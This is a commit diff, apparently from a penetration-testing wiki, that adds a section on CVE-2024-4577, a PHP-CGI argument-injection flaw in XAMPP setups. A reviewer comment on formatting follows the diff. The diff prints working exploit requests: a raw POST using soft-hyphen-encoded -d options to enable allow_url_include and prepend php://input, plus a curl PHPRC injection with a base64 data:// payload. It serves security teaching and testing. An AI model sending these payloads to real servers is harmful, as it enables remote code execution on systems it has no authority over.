Commit

GITBOOK-4368: No subject
carlospolop authored and gitbook-bot committed Jul 17, 2024
1 parent f9c3fac commit 3559814
Showing 1 changed file with 25 additions and 0 deletions.
Expand Up @@ -336,6 +336,31 @@ If you find a vulnerability that allows you to **modify env variables in PHP** (
* `curl "http://10.12.72.1/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'`
* Technique [**from this report**](https://vulncheck.com/blog/juniper-cve-2023-36845).

### XAMPP CGI RCE - CVE-2024-4577

The webserver parses HTTP requests and passes them to a PHP script executing a request such as as [`http://host/cgi.php?foo=bar`](http://host/cgi.php?foo=bar\&ref=labs.watchtowr.com) as `php.exe cgi.php foo=bar`, which allows a parameter injection. This would allow to inject the following parameters to load the PHP code from the body:

```jsx
-d allow_url_include=1 -d auto_prepend_file=php://input
```

Moreover, it's possible to inject the "-" param using the 0xAD character due to later normalization of PHP. Check. the exploit example from [**this post**](https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/):

```jsx
POST /test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{host}}
User-Agent: curl/8.3.0
Accept: */*
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
<?php
phpinfo();
?>
```
## PHP Static analysis
Look if you can insert code in calls to these functions (from [here](https://www.youtube.com/watch?v=SyWUsN0yHKI\&feature=youtu.be)):
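
Review bot: The HTTP request in the second fenced block of the new CVE-2024-4577 section has no blank line between `Connection: keep-alive` and `<?php`, so as written the PHP payload reads as part of the header block instead of the body that `Content-Length: 23` describes. Add the empty separator line. Both new fences are tagged `jsx`, although the first holds PHP command-line options and the second a raw HTTP request; `http` or an untagged fence would render more faithfully. In the prose, "such as as" repeats a word, "Check. the exploit example" has a stray period, and "This would allow to inject" needs an object ("allow an attacker to inject"). The inline link to `http://host/cgi.php?foo=bar` also carries a leftover `\&ref=labs.watchtowr.com` tracking parameter that should be dropped. Finally, the heading names XAMPP but the text never says which setups are affected or how to check for and fix the issue; a sentence pointing readers to that information in the linked post would make the section usable for triage as well.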